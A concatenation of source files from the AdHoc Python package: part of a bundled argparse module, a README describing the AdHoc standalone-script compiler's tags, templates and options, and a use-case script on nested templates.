# match the pattern for this action to the arg strings
nargs_pattern = self._get_nargs_pattern(action)
match = _re.match(nargs_pattern, arg_strings_pattern)
# raise an exception if we weren't able to find a match
if match is None:
nargs_errors = {
None: _('expected one argument'),
OPTIONAL: _('expected at most one argument'),
ONE_OR_MORE: _('expected at least one argument'),
}
default = _('expected %s argument(s)') % action.nargs
msg = nargs_errors.get(action.nargs, default)
raise ArgumentError(action, msg)
# return the number of arguments matched
return len(match.group(1))
def _match_arguments_partial(self, actions, arg_strings_pattern):
# progressively shorten the actions list by slicing off the
# final actions until we find a match
result = []
for i in range(len(actions), 0, -1):
actions_slice = actions[:i]
pattern = ''.join([self._get_nargs_pattern(action)
for action in actions_slice])
match = _re.match(pattern, arg_strings_pattern)
if match is not None:
result.extend([len(string) for string in match.groups()])
break
# return the list of arg string counts
return result
def _parse_optional(self, arg_string):
# if it's an empty string, it was meant to be a positional
if not arg_string:
return None
# if it doesn't start with a prefix, it was meant to be positional
if not arg_string[0] in self.prefix_chars:
return None
# if the option string is present in the parser, return the action
if arg_string in self._option_string_actions:
action = self._option_string_actions[arg_string]
return action, arg_string, None
# if it's just a single character, it was meant to be positional
if len(arg_string) == 1:
return None
# if the option string before the "=" is present, return the action
if '=' in arg_string:
option_string, explicit_arg = arg_string.split('=', 1)
if option_string in self._option_string_actions:
action = self._option_string_actions[option_string]
return action, option_string, explicit_arg
# search through all possible prefixes of the option string
# and all actions in the parser for possible interpretations
option_tuples = self._get_option_tuples(arg_string)
# if multiple actions match, the option string was ambiguous
if len(option_tuples) > 1:
options = ', '.join([option_string
for action, option_string, explicit_arg in option_tuples])
tup = arg_string, options
self.error(_('ambiguous option: %s could match %s') % tup)
# if exactly one action matched, this segmentation is good,
# so return the parsed action
elif len(option_tuples) == 1:
option_tuple, = option_tuples
return option_tuple
# if it was not found as an option, but it looks like a negative
# number, it was meant to be positional
# unless there are negative-number-like options
if self._negative_number_matcher.match(arg_string):
if not self._has_negative_number_optionals:
return None
# if it contains a space, it was meant to be a positional
if ' ' in arg_string:
return None
# it was meant to be an optional but there is no such option
# in this parser (though it might be a valid option in a subparser)
return None, arg_string, None
def _get_option_tuples(self, option_string):
result = []
# option strings starting with two prefix characters are only
# split at the '='
chars = self.prefix_chars
if option_string[0] in chars and option_string[1] in chars:
if '=' in option_string:
option_prefix, explicit_arg = option_string.split('=', 1)
else:
option_prefix = option_string
explicit_arg = None
for option_string in self._option_string_actions:
if option_string.startswith(option_prefix):
action = self._option_string_actions[option_string]
tup = action, option_string, explicit_arg
result.append(tup)
# single character options can be concatenated with their arguments
# but multiple character options always have to have their argument
# separate
elif option_string[0] in chars and option_string[1] not in chars:
option_prefix = option_string
explicit_arg = None
short_option_prefix = option_string[:2]
short_explicit_arg = option_string[2:]
for option_string in self._option_string_actions:
if option_string == short_option_prefix:
action = self._option_string_actions[option_string]
tup = action, option_string, short_explicit_arg
result.append(tup)
elif option_string.startswith(option_prefix):
action = self._option_string_actions[option_string]
tup = action, option_string, explicit_arg
result.append(tup)
# shouldn't ever get here
else:
self.error(_('unexpected option string: %s') % option_string)
# return the collected option tuples
return result
def _get_nargs_pattern(self, action):
# in all examples below, we have to allow for '--' args
# which are represented as '-' in the pattern
nargs = action.nargs
# the default (None) is assumed to be a single argument
if nargs is None:
nargs_pattern = '(-*A-*)'
# allow zero or one arguments
elif nargs == OPTIONAL:
nargs_pattern = '(-*A?-*)'
# allow zero or more arguments
elif nargs == ZERO_OR_MORE:
nargs_pattern = '(-*[A-]*)'
# allow one or more arguments
elif nargs == ONE_OR_MORE:
nargs_pattern = '(-*A[A-]*)'
# allow any number of options or arguments
elif nargs == REMAINDER:
nargs_pattern = '([-AO]*)'
# allow one argument followed by any number of options or arguments
elif nargs == PARSER:
nargs_pattern = '(-*A[-AO]*)'
# all others should be integers
else:
nargs_pattern = '(-*%s-*)' % '-*'.join('A' * nargs)
# if this is an optional action, -- is not allowed
if action.option_strings:
nargs_pattern = nargs_pattern.replace('-*', '')
nargs_pattern = nargs_pattern.replace('-', '')
# return the pattern
return nargs_pattern
# ========================
# Value conversion methods
# ========================
def _get_values(self, action, arg_strings):
# for everything but PARSER args, strip out '--'
if action.nargs not in [PARSER, REMAINDER]:
arg_strings = [s for s in arg_strings if s != '--']
# optional argument produces a default when not present
if not arg_strings and action.nargs == OPTIONAL:
if action.option_strings:
value = action.const
else:
value = action.default
if isinstance(value, basestring):
value = self._get_value(action, value)
self._check_value(action, value)
# when nargs='*' on a positional, if there were no command-line
# args, use the default if it is anything other than None
elif (not arg_strings and action.nargs == ZERO_OR_MORE and
not action.option_strings):
if action.default is not None:
value = action.default
else:
value = arg_strings
self._check_value(action, value)
# single argument or optional argument produces a single value
elif len(arg_strings) == 1 and action.nargs in [None, OPTIONAL]:
arg_string, = arg_strings
value = self._get_value(action, arg_string)
self._check_value(action, value)
# REMAINDER arguments convert all values, checking none
elif action.nargs == REMAINDER:
value = [self._get_value(action, v) for v in arg_strings]
# PARSER arguments convert all values, but check only the first
elif action.nargs == PARSER:
value = [self._get_value(action, v) for v in arg_strings]
self._check_value(action, value[0])
# all other types of nargs produce a list
else:
value = [self._get_value(action, v) for v in arg_strings]
for v in value:
self._check_value(action, v)
# return the converted value
return value
def _get_value(self, action, arg_string):
type_func = self._registry_get('type', action.type, action.type)
if not _callable(type_func):
msg = _('%r is not callable')
raise ArgumentError(action, msg % type_func)
# convert the value to the appropriate type
try:
result = type_func(arg_string)
# ArgumentTypeErrors indicate errors
except ArgumentTypeError:
name = getattr(action.type, '__name__', repr(action.type))
msg = str(_sys.exc_info()[1])
raise ArgumentError(action, msg)
# TypeErrors or ValueErrors also indicate errors
except (TypeError, ValueError):
name = getattr(action.type, '__name__', repr(action.type))
msg = _('invalid %s value: %r')
raise ArgumentError(action, msg % (name, arg_string))
# return the converted value
return result
def _check_value(self, action, value):
# converted value must be one of the choices (if specified)
if action.choices is not None and value not in action.choices:
tup = value, ', '.join(map(repr, action.choices))
msg = _('invalid choice: %r (choose from %s)') % tup
raise ArgumentError(action, msg)
# =======================
# Help-formatting methods
# =======================
def format_usage(self):
formatter = self._get_formatter()
formatter.add_usage(self.usage, self._actions,
self._mutually_exclusive_groups)
return formatter.format_help()
def format_help(self):
formatter = self._get_formatter()
# usage
formatter.add_usage(self.usage, self._actions,
self._mutually_exclusive_groups)
# description
formatter.add_text(self.description)
# positionals, optionals and user-defined groups
for action_group in self._action_groups:
formatter.start_section(action_group.title)
formatter.add_text(action_group.description)
formatter.add_arguments(action_group._group_actions)
formatter.end_section()
# epilog
formatter.add_text(self.epilog)
# determine help from format above
return formatter.format_help()
def format_version(self):
import warnings
warnings.warn(
'The format_version method is deprecated -- the "version" '
'argument to ArgumentParser is no longer supported.',
DeprecationWarning)
formatter = self._get_formatter()
formatter.add_text(self.version)
return formatter.format_help()
def _get_formatter(self):
return self.formatter_class(prog=self.prog)
# =====================
# Help-printing methods
# =====================
def print_usage(self, file=None):
if file is None:
file = _sys.stdout
self._print_message(self.format_usage(), file)
def print_help(self, file=None):
if file is None:
file = _sys.stdout
self._print_message(self.format_help(), file)
def print_version(self, file=None):
import warnings
warnings.warn(
'The print_version method is deprecated -- the "version" '
'argument to ArgumentParser is no longer supported.',
DeprecationWarning)
self._print_message(self.format_version(), file)
def _print_message(self, message, file=None):
if message:
if file is None:
file = _sys.stderr
file.write(message)
# ===============
# Exiting methods
# ===============
def exit(self, status=0, message=None):
if message:
self._print_message(message, _sys.stderr)
_sys.exit(status)
def error(self, message):
"""error(message: string)
Prints a usage message incorporating the message to stderr and
exits.
If you override this in a subclass, it should not return -- it
should either exit or raise an exception.
"""
self.print_usage(_sys.stderr)
self.exit(2, _('%s: error: %s\n') % (self.prog, message)) | AdHoc | /AdHoc-0.3.2.tar.gz/AdHoc-0.3.2/argparse_local.py | argparse_local.py |
.. -*- mode: rst; coding: utf-8 -*-
.. role:: mod(strong)
.. role:: func(strong)
.. role:: class(strong)
.. role:: attr(strong)
.. role:: meth(strong)
AdHoc Standalone Python Script Generator
########################################
The *AdHoc* compiler can be used as a program (see `Script Usage`_)
as well as a module (see :class:`adhoc.AdHoc`).
Since the *AdHoc* compiler itself is installed as a compiled *AdHoc*
script, it serves as its own usage example.
After installation of the *adhoc.py* script, the full source can be
obtained in directory ``__adhoc__``, by executing::
adhoc.py --explode
.. contents::
Purpose
=======
*AdHoc* provides python scripts with
- template facilities
- default file generation
- standalone module inclusion
*AdHoc* has been designed to provide an implode/explode cycle:
======== ======= ========= ======= =========
source_0 xsource_0
source_1 implode explode xsource_1
... ------> script.py ------> ...
source_n xsource_n
======== ======= ========= ======= =========
where ``xsource_i === source_i``. I.e., ``diff source_i xsource_i``
does not produce any output.
Quickstart
==========
module.py:
| # -\*- coding: utf-8 -\*-
| mvar = 'value'
script.py:
| # -\*- coding: utf-8 -\*-
| # |adhoc_run_time|
| import module # |adhoc|
| print('mvar: ' + module.mvar)
Compilation::
adhoc.py --compile script.py >/tmp/script-compiled.py
Execution outside source directory::
cd /tmp && python script-compiled.py
shows::
mvar: value
Decompilation::
cd /tmp && \
mkdir -p __adhoc__ && \
adhoc.py --decompile <script-compiled.py >__adhoc__/script.py
.. |@:| replace:: ``@:``
.. |:@| replace:: ``:@``
.. |adhoc_run_time| replace:: |@:|\ ``adhoc_run_time``\ |:@|
.. |adhoc| replace:: |@:|\ ``adhoc``\ |:@|
Description
===========
The *AdHoc* compiler/decompiler parses text for tagged lines and
processes them as instructions.
The minimal parsed entity is a tagged line, which is any line
containing a recognized *AdHoc* tag.
All *AdHoc* tags are enclosed in delimiters (default: |@:| and |:@|). E.g:
|@:|\ adhoc\ |:@|
Delimiters come in several flavors, namely line and section
delimiters and a set of macro delimiters. By default, line and
section delimiters are the same, but they can be defined separately.
`Flags`_ are tagged lines, which denote a single option or
command. E.g.:
| import module # |@:|\ adhoc\ |:@|
| # |@:|\ adhoc_self\ |:@| my_module_name
`Sections`_ are tagged line pairs, which delimit a block of
text. The first tagged line opens the section, the second tagged
line closes the section. E.g.:
| # |@:|\ adhoc_enable\ |:@|
| # disabled_command()
| # |@:|\ adhoc_enable\ |:@|
`Macros`_ have their own delimiters (default: |@m| and |m>|). E.g.:
| # |@m|\ MACRO_NAME\ |m>|
The implementation is realized as class :class:`adhoc.AdHoc` which
is mainly used as a namespace. The run-time part of
:class:`adhoc.AdHoc` -- which handles module import and file export
-- is included verbatim as class :class:`RtAdHoc` in the generated
output.
Flags
-----
:|adhoc_run_time|:
The place where the *AdHoc* run-time code is added. This flag must
be present in files, which use the |adhoc| import feature. It
is not needed for the enable/disable features.
This flag is ignored, if double commented. E.g.:
| # # |adhoc_run_time|
:|adhoc| [force] [flat | full]:
Mark import line for run-time compilation.
If ``force`` is specified, the module is imported, even if it
was imported before.
If ``flat`` is specified, the module is not recursively
exported.
If ``full`` is specified, the module is recursively
exported. (This parameter takes priority over ``flat``).
If neither ``flat`` nor ``full`` are specified,
:attr:`adhoc.AdHoc.flat` determines the export scope.
This flag is ignored, if the line is commented out. E.g.:
| # import module # |adhoc|
.. _adhoc_include:
:|adhoc_include| file_spec, ...:
Include files for unpacking. ``file_spec`` is one of
:file:
``file`` is used for both input and output.
:file ``from`` default-file:
``file`` is used for input and output. if ``file`` does not
exist, ``default-file`` is used for input.
:source-file ``as`` output-file:
``source-file`` is used for input. ``output-file`` is used for
output. If ``source-file`` does not exist, ``output-file`` is
used for input also.
This flag is ignored, if double commented. E.g.:
| # # |adhoc_include| file
:|adhoc_verbatim| [flags] file_spec, ...:
Include files for verbatim extraction. See adhoc_include_ for
``file_spec``.
The files are included as |adhoc_template_v| sections. *file* is used
as *export_file* mark. If *file* is ``--``, the template disposition
becomes standard output.
Optional flags can be any combination of ``[+|-]NUM`` for
indentation and ``#`` for commenting. E.g.:
| # |adhoc_verbatim| +4# my_file from /dev/null
*my_file* (or ``/dev/null``) is read, commented and indented 4
spaces.
If the |adhoc_verbatim| tag is already indented, the specified
indentation is subtracted.
This flag is ignored, if double commented. E.g.:
| # # |adhoc_verbatim| file
:|adhoc_self| name ...:
Mark name(s) as currently compiling. This is useful, if
``__init__.py`` imports other module parts. E.g:
| import pyjsmo # |@:|\ adhoc\ |:@|
where ``pyjsmo/__init__.py`` contains:
| # |@:|\ adhoc_self\ |:@| pyjsmo
| from pyjsmo.base import * # |@:|\ adhoc\ |:@|
:|adhoc_compiled|:
If present, no compilation is done on this file. This flag is
added by the compiler to the run-time version.
Sections
--------
:|adhoc_enable|:
Leading comment char and exactly one space are removed from lines
in these sections.
:|adhoc_disable|:
A comment char and exactly one space are added to non-blank
lines in these sections.
:|adhoc_template| -mark | export_file:
If mark starts with ``-``, the output disposition is standard output
and the template is ignored, when exporting.
Otherwise, the template is written to output_file during export.
All template parts with the same mark/export_file are concatenated
to a single string.
:|adhoc_template_v| export_file:
Variation of |adhoc_template|. Automatically generated by |adhoc_verbatim|.
:|adhoc_uncomment|:
Treated like |adhoc_enable| before template output.
:|adhoc_indent| [+|-]NUM:
Add or remove indentation before template output.
:|adhoc_import|:
Imported files are marked as such by the compiler. There is no
effect during compilation.
:|adhoc_unpack|:
Included files are marked as such by the compiler. There is no
effect during compilation.
:|adhoc_remove|:
Added sections are marked as such by the compiler. Removal is
done when exporting.
Before compilation, existing |adhoc_remove| tags are renamed to
|adhoc_remove_|.
After automatically added |adhoc_remove| sections have been
removed during export, remaining |adhoc_remove_| tags are
renamed to |adhoc_remove| again.
.. note:: Think twice, before removing material from original
sources at compile time. It will violate the condition
``xsource_i === source_i``.
:|adhoc_run_time_engine|:
The run-time class :class:`RtAdHoc` is enclosed in this special
template section.
It is exported as ``rt_adhoc.py`` during export.
Macros
------
Macros are defined programmatically::
AdHoc.macros[MACRO_NAME] = EXPANSION_STRING
A macro is invoked by enclosing a MACRO_NAME in
:attr:`adhoc.AdHoc.macro_call_delimiters`. (Default: |@m|, |m>|).
:|MACRO_NAME|:
Macro call.
Internal
--------
:|adhoc_run_time_class|:
Marks the beginning of the run-time class. This is only
recognized in the *AdHoc* programm/module.
:|adhoc_run_time_section|:
All sections are concatenated and used as run-time code. This is
only recognized in the *AdHoc* programm/module.
In order to preserve the ``xsource_i === source_i`` bijective
condition, macros are expanded/collapsed with special macro
definition sections. (See :attr:`adhoc.AdHoc.macro_xdef_delimiters`;
Default: |<m|, |m@|).
:|adhoc_macro_call|:
Macro call section.
:|adhoc_macro_expansion|:
Macro expansion section.
AdHoc Script
============
.. |adhoc_self| replace:: |@:|\ ``adhoc_self``\ |:@|
.. |adhoc_include| replace:: |@:|\ ``adhoc_include``\ |:@|
.. |adhoc_verbatim| replace:: |@:|\ ``adhoc_verbatim``\ |:@|
.. |adhoc_compiled| replace:: |@:|\ ``adhoc_compiled``\ |:@|
.. |adhoc_enable| replace:: |@:|\ ``adhoc_enable``\ |:@|
.. |adhoc_disable| replace:: |@:|\ ``adhoc_disable``\ |:@|
.. |adhoc_template| replace:: |@:|\ ``adhoc_template``\ |:@|
.. |adhoc_template_v| replace:: |@:|\ ``adhoc_template_v``\ |:@|
.. |adhoc_uncomment| replace:: |@:|\ ``adhoc_uncomment``\ |:@|
.. |adhoc_indent| replace:: |@:|\ ``adhoc_indent``\ |:@|
.. |adhoc_import| replace:: |@:|\ ``adhoc_import``\ |:@|
.. |adhoc_unpack| replace:: |@:|\ ``adhoc_unpack``\ |:@|
.. |adhoc_remove| replace:: |@:|\ ``adhoc_remove``\ |:@|
.. |adhoc_remove_| replace:: |@:|\ ``adhoc_remove_``\ |:@|
.. |adhoc_run_time_class| replace:: |@:|\ ``adhoc_run_time_class``\ |:@|
.. |adhoc_run_time_section| replace:: |@:|\ ``adhoc_run_time_section``\ |:@|
.. |adhoc_run_time_engine| replace:: |@:|\ ``adhoc_run_time_engine``\ |:@|
.. |@m| replace:: ``@|:``
.. |m>| replace:: ``:|>``
.. |<m| replace:: ``<|:``
.. |m@| replace:: ``:|@``
.. |MACRO_NAME| replace:: |@m|\ ``MACRO_NAME``\ |m>|
.. |adhoc_macro_call| replace:: |<m|\ ``adhoc_macro_call``\ |m@|
.. |adhoc_macro_expansion| replace:: |<m|\ ``adhoc_macro_expansion``\ |m@|
.. _Script Usage:
adhoc.py - Python ad hoc compiler.
====== ====================
usage: adhoc.py [OPTIONS] [file ...]
or import adhoc
====== ====================
Options
=======
===================== ==================================================
-c, --compile compile file(s) or standard input into output file
(default: standard output).
-d, --decompile decompile file(s) or standard input into
output directory (default ``__adhoc__``).
-o, --output OUT output file for --compile/output directory for
--decompile.
-q, --quiet suppress warnings
-v, --verbose verbose test output
--debug[=NUM] show debug information
-h, --help display this help message
--documentation display module documentation.
--template list show available templates.
--eide[=COMM] Emacs IDE template list (implies --template list).
--template[=NAME] extract named template to standard
output. Default NAME is ``-``.
--extract[=DIR] extract adhoc files to directory DIR (default: ``.``)
--explode[=DIR] explode script with adhoc in directory DIR
(default ``__adhoc__``)
--implode implode script with adhoc
--install install adhoc.py script
-t, --test run doc tests
===================== ==================================================
*adhoc.py* is compatible with Python 2.4+ and Python 3. (For Python
<2.6 the packages *stringformat* and *argparse* are needed and
included.)
.. _END_OF_HELP:
.. |=NUM| replace:: ``[=NUM]``
Script Examples
===============
Templates
---------
Sections marked by |adhoc_template| can be retrieved as templates on
standard output.
Additionally, all other files compiled into an adhoc file with one of
================ ======================
|adhoc| ==> |adhoc_import|
|adhoc_verbatim| ==> |adhoc_template_v|
|adhoc_include| ==> |adhoc_unpack|
================ ======================
are accessible as templates.
``python adhoc.py --template list`` provides a list of templates:
>>> ign = main('adhoc.py --template list'.split())
================================================= ================================ ================
Command Template Type
================================================= ================================ ================
adhoc.py --template adhoc_test # !adhoc_test adhoc_import
adhoc.py --template adhoc_test.sub # !adhoc_test.sub adhoc_import
adhoc.py --template argparse_local # !argparse_local adhoc_import
adhoc.py --template namespace_dict # !namespace_dict adhoc_import
adhoc.py --template stringformat_local # !stringformat_local adhoc_import
adhoc.py --template use_case_000_ # !use_case_000_ adhoc_import
adhoc.py --template use_case_001_templates_ # !use_case_001_templates_ adhoc_import
adhoc.py --template use_case_002_include_ # !use_case_002_include_ adhoc_import
adhoc.py --template use_case_003_import_ # !use_case_003_import_ adhoc_import
adhoc.py --template use_case_005_nested_ # !use_case_005_nested_ adhoc_import
adhoc.py --template docutils.conf # docutils.conf adhoc_template_v
adhoc.py --template # - adhoc_template
adhoc.py --template README.txt # README.txt adhoc_template
adhoc.py --template adhoc_init # -adhoc_init adhoc_template
adhoc.py --template catch-stdout # -catch-stdout adhoc_template
adhoc.py --template col-param-closure # -col-param-closure adhoc_template
adhoc.py --template doc/USE_CASES.txt # doc/USE_CASES.txt adhoc_template
adhoc.py --template doc/index.rst # doc/index.rst adhoc_template
adhoc.py --template max-width-class # -max-width-class adhoc_template
adhoc.py --template rst-to-ascii # -rst-to-ascii adhoc_template
adhoc.py --template test # -test adhoc_template
adhoc.py --template MANIFEST.in # !MANIFEST.in adhoc_unpack
adhoc.py --template Makefile # !Makefile adhoc_unpack
adhoc.py --template README.css # !README.css adhoc_unpack
adhoc.py --template doc/Makefile # !doc/Makefile adhoc_unpack
adhoc.py --template doc/_static/adhoc-logo-32.ico # !doc/_static/adhoc-logo-32.ico adhoc_unpack
adhoc.py --template doc/adhoc-logo.svg # !doc/adhoc-logo.svg adhoc_unpack
adhoc.py --template doc/conf.py # !doc/conf.py adhoc_unpack
adhoc.py --template doc/make.bat # !doc/make.bat adhoc_unpack
adhoc.py --template doc/z-massage-index.sh # !doc/z-massage-index.sh adhoc_unpack
adhoc.py --template setup.py # !setup.py adhoc_unpack
================================================= ================================ ================
``python adhoc.py --template`` prints the standard template ``-``
(closing delimiter replaced by ellipsis):
>>> ign = main('./adhoc.py --template'.split()) #doctest: +ELLIPSIS
# @:adhoc_disable... allow modification of exploded sources in original place
sys.path.append('__adhoc__')
# @:adhoc_disable...
<BLANKLINE>
# @:adhoc_run_time... The run-time class goes here
# @:adhoc_run_time_engine... settings enabled at run-time
# @:adhoc_enable...
# RtAdHoc.flat = False
# @:adhoc_enable...
# @:adhoc_run_time_engine...
<BLANKLINE>
#import adhoc # @:adhoc...
``python adhoc.py --template test`` prints the template named ``-test``.
the leading ``-`` signifies disposition to standard output:
>>> ign = main('./adhoc.py --template test'.split())
Test template.
Extract
-------
The default destination for extracting files is the current working
directory.
Files extracted consist of
- packed files generated by |adhoc_include|
- templates generated by |adhoc_verbatim|
- templates with a file destination other than standard output
``python adhoc.py --extract __adhoc_extract__`` unpacks the following files into
directory ``__adhoc_extract__``:
>>> import shutil
>>> ign = main('./adhoc.py --extract __adhoc_extract__'.split())
>>> file_list = []
>>> for dir, subdirs, files in os.walk('__adhoc_extract__'):
... file_list.extend([os.path.join(dir, file_) for file_ in files])
>>> for file_ in sorted(file_list):
... printf(file_)
__adhoc_extract__/MANIFEST.in
__adhoc_extract__/Makefile
__adhoc_extract__/README.css
__adhoc_extract__/README.txt
__adhoc_extract__/doc/Makefile
__adhoc_extract__/doc/USE_CASES.txt
__adhoc_extract__/doc/_static/adhoc-logo-32.ico
__adhoc_extract__/doc/adhoc-logo.svg
__adhoc_extract__/doc/conf.py
__adhoc_extract__/doc/index.rst
__adhoc_extract__/doc/make.bat
__adhoc_extract__/doc/z-massage-index.sh
__adhoc_extract__/docutils.conf
__adhoc_extract__/setup.py
__adhoc_extract__/use_case_000_.py
__adhoc_extract__/use_case_001_templates_.py
__adhoc_extract__/use_case_002_include_.py
__adhoc_extract__/use_case_003_import_.py
__adhoc_extract__/use_case_005_nested_.py
>>> shutil.rmtree('__adhoc_extract__')
Export
------
The default destination for exporting files is the
subdirectory ``__adhoc__``.
Files exported consist of
- imported modules generated by |adhoc|
- all files covered in section `Extract`_
``python adhoc.py --explode __adhoc_explode__`` unpacks the following files into
directory ``__adhoc_explode__``:
>>> import shutil
>>> ign = main('./adhoc.py --explode __adhoc_explode__'.split())
>>> file_list = []
>>> for dir, subdirs, files in os.walk('__adhoc_explode__'):
... file_list.extend([os.path.join(dir, file_) for file_ in files])
>>> for file_ in sorted(file_list):
... printf(file_)
__adhoc_explode__/MANIFEST.in
__adhoc_explode__/Makefile
__adhoc_explode__/README.css
__adhoc_explode__/README.txt
__adhoc_explode__/adhoc.py
__adhoc_explode__/adhoc_test/__init__.py
__adhoc_explode__/adhoc_test/sub/__init__.py
__adhoc_explode__/argparse_local.py
__adhoc_explode__/doc/Makefile
__adhoc_explode__/doc/USE_CASES.txt
__adhoc_explode__/doc/_static/adhoc-logo-32.ico
__adhoc_explode__/doc/adhoc-logo.svg
__adhoc_explode__/doc/conf.py
__adhoc_explode__/doc/index.rst
__adhoc_explode__/doc/make.bat
__adhoc_explode__/doc/z-massage-index.sh
__adhoc_explode__/docutils.conf
__adhoc_explode__/namespace_dict.py
__adhoc_explode__/rt_adhoc.py
__adhoc_explode__/setup.py
__adhoc_explode__/stringformat_local.py
__adhoc_explode__/use_case_000_.py
__adhoc_explode__/use_case_001_templates_.py
__adhoc_explode__/use_case_002_include_.py
__adhoc_explode__/use_case_003_import_.py
__adhoc_explode__/use_case_005_nested_.py
>>> shutil.rmtree('__adhoc_explode__')
File Permissions
================
- File mode is restored.
- File ownership is not restored.
- File modification times are restored.
Since only naive datetimes are recorded, this only works correctly
within the same timezone.
.. :ide: COMPILE: render reST as HTML
.. . (let* ((fp (buffer-file-name)) (fn (file-name-nondirectory fp))) (save-match-data (if (string-match-t "[.][^.]*$" fn) (setq fn (replace-match "" nil t fn)))) (let ((args (concat " " fp " | ws_rst2html.py --traceback --cloak-email-addresses | tee " fn ".html "))) (save-buffer) (compile (concat "PATH=\".:$PATH\"; cat " args))))
..
.. Local Variables:
.. mode: rst
.. snip-mode: rst
.. truncate-lines: t
.. symbol-tag-symbol-regexp: "[-0-9A-Za-z_#]\\([-0-9A-Za-z_. ]*[-0-9A-Za-z_]\\|\\)"
.. symbol-tag-auto-comment-mode: nil
.. symbol-tag-srx-is-safe-with-nil-delimiters: nil
.. End:
| AdHoc | /AdHoc-0.3.2.tar.gz/AdHoc-0.3.2/README.txt | README.txt |
# @:adhoc_uncomment:@
# @:adhoc_template:@ -intro
# Nested Templates
# ----------------
#
# Since AdHoc sections are defined with the same tag denoting start
# and end, it may not be obvious how nested templates can be realized.
#
# There are several different ways to achieve section nesting:
#
# - `Alternate Tag Symbols`_
# - `Alternate Tag Delimiters`_
# - replace strings and extract templates
#
# @:adhoc_template:@
# @:adhoc_uncomment:@
# --------------------------------------------------
# |||:sec:||| Example
# --------------------------------------------------
# @:adhoc_indent:@ +4
# <:adhoc_indent:> +4
# <:adhoc_template:> -example
# @:adhoc_uncomment:@
# @:adhoc_template:@ -doc
# Documentation
# =============
#
# Summary
#
# @:adhoc_x_full_doc:@ -details
# @:adhoc_template:> -details
# Details
# -------
#
# Lengthy explanation ...
#
# @:adhoc_template:>
# @:adhoc_x_full_doc:@
# Conclusion
# ----------
#
# Good!
#
# @:adhoc_x_full_doc:@
# @:adhoc_template:>
# Because ...
#
# @:adhoc_template:>
# @:adhoc_x_full_doc:@
# @:adhoc_template:@
# @:adhoc_uncomment:@
# <:adhoc_template:> -example
# <:adhoc_indent:>
# @:adhoc_indent:@
# --------------------------------------------------
# |||:sec:||| Generator
# --------------------------------------------------
uc_descr_beg = (
'# <:' 'adhoc_uncomment:>\n'
'# o:' 'adhoc_template:>\n'
'# i:' 'adhoc_template:>\n'
)
uc_descr_out = (
'# i:' 'adhoc_template:>\n'
)
uc_descr_end = (
'# o:' 'adhoc_template:>\n'
'# <:' 'adhoc_uncomment:>\n'
)
uc_code_beg = (
'# i:' 'adhoc_indent:> 4\n'
'# <:' 'adhoc_template:>\n'
)
uc_code_end = (
'# <:' 'adhoc_template:>\n'
'# i:' 'adhoc_indent:>\n'
)
macros = {
'uc_descr_beg': uc_descr_beg,
'uc_descr_out': uc_descr_out,
'uc_descr_end': uc_descr_end,
'uc_code_beg': uc_code_beg,
'uc_code_end': uc_code_end,
}
def main(argv):
'''compiler and help/example/documentation extractor'''
global RtAdHoc
RtAdHoc.macros = macros
if len(argv) > 1:
if argv[1].startswith('-h') or argv[1].startswith('--h'):
print(__doc__)
return 1
if (argv[1].startswith('--c')
or argv[1].startswith('--d')
or argv[1].startswith('--t')):
file_, source = RtAdHoc.std_source_param(__file__)
if 'adhoc' not in globals() and 'rt_adhoc' not in globals():
compiled = source
source = RtAdHoc.export_source(source)
else:
if 'adhoc' not in globals():
# this will most certainly fail
from adhoc import AdHoc as RtAdHoc
RtAdHoc.macros = macros
compiled = None
if argv[1].startswith('--t'):
template(RtAdHoc.activate_macros(source))
return 1
if compiled is None:
compiled = RtAdHoc().compile(source)
if argv[1].startswith('--c'):
RtAdHoc.write_source('-', compiled)
return 1
if argv[1].startswith('--d'):
documentation()
return 1
map(sys.stderr.write, ('error: unknown option `', str(argv[1]), '`\n'))
exit(1)
return 0
# --------------------------------------------------
# |||:sec:||| Setup
# --------------------------------------------------
# @:adhoc_template:@ -generic-init
# @:adhoc_run_time:@
# @:adhoc_disable:@
# Get RtAdHoc from adhoc or rt_adhoc
import os
import sys
os_path = os.defpath
if 'PATH' in os.environ:
os_path = os.environ['PATH']
sys_path = sys.path
sys.path.extend(os_path.split(os.pathsep))
try:
import adhoc
from adhoc import AdHoc as RtAdHoc
except ImportError:
try:
import rt_adhoc
from rt_adhoc import RtAdHoc
except ImportError:
pass
sys.path = sys_path
# @:adhoc_disable:@
# @:adhoc_template:@ -generic-init
@classmethod
def __getstate__(cls):
attribs = (
'line_delimiters',
'section_delimiters',
)
state = {}
for attrib in attribs:
state[attrib] = getattr(cls, attrib)
return state
@classmethod
def __setstate__(cls, state):
for attrib, value in state.items():
setattr(cls, attrib, value)
@classmethod
def set_delimiters(cls, line_delimiters, section_delimiters=None):
state = cls.__getstate__()
if section_delimiters is None:
section_delimiters = line_delimiters
cls.line_delimiters = line_delimiters
cls.section_delimiters = section_delimiters
return state
reset_delimiters = __setstate__
def print_template(cls, name, source=None):
tpl = cls.get_named_template(name, __file__, source)
cls.write_source('-', tpl)
if not hasattr(RtAdHoc, '__getstate__'):
RtAdHoc.__getstate__ = __getstate__
RtAdHoc.__setstate__ = __setstate__
if not hasattr(RtAdHoc, 'set_delimiters'):
RtAdHoc.set_delimiters = set_delimiters
RtAdHoc.reset_delimiters = reset_delimiters
# --------------------------------------------------
# |||:sec:||| Documentation
# --------------------------------------------------
def template(source=None): # ||:fnc:||
if source is None:
source = RtAdHoc.read_source(__file__)
source = source.replace('<:' 'adhoc', '@:' 'adhoc')
source = source.replace('@:' 'adhoc_indent' ':@ -0', '@:' 'adhoc_indent' ':@ -4')
print_template(RtAdHoc, '-generic-init', source)
RtAdHoc.write_source('-', '\n')
print_template(RtAdHoc, '-alt-sym1', source)
print_template(RtAdHoc, '-alt-sym2', source)
print_template(RtAdHoc, '-alt-sym3', source)
print_template(RtAdHoc, '-alt-sym4', source)
print_template(RtAdHoc, '-alt-sym5', source)
print_template(RtAdHoc, '-alt-sym6', source)
RtAdHoc.write_source('-', '\n')
print_template(RtAdHoc, '-alt-dlm1', source)
print_template(RtAdHoc, '-alt-dlm2', source)
print_template(RtAdHoc, '-alt-dlm3', source)
print_template(RtAdHoc, '-alt-dlm4', source)
print_template(RtAdHoc, '-alt-dlm5', source)
def documentation(): # ||:fnc:||
print_template(RtAdHoc, '-intro')
example_delimiters = ('<:', ':>')
state = RtAdHoc.set_delimiters(example_delimiters)
example_raw = RtAdHoc.get_named_template('-example', __file__)
RtAdHoc.reset_delimiters(state)
full_doc_delimiters = ('@:', ':>')
state = RtAdHoc.set_delimiters(full_doc_delimiters)
example1 = RtAdHoc.section_tag_remove(example_raw, 'adhoc_template')
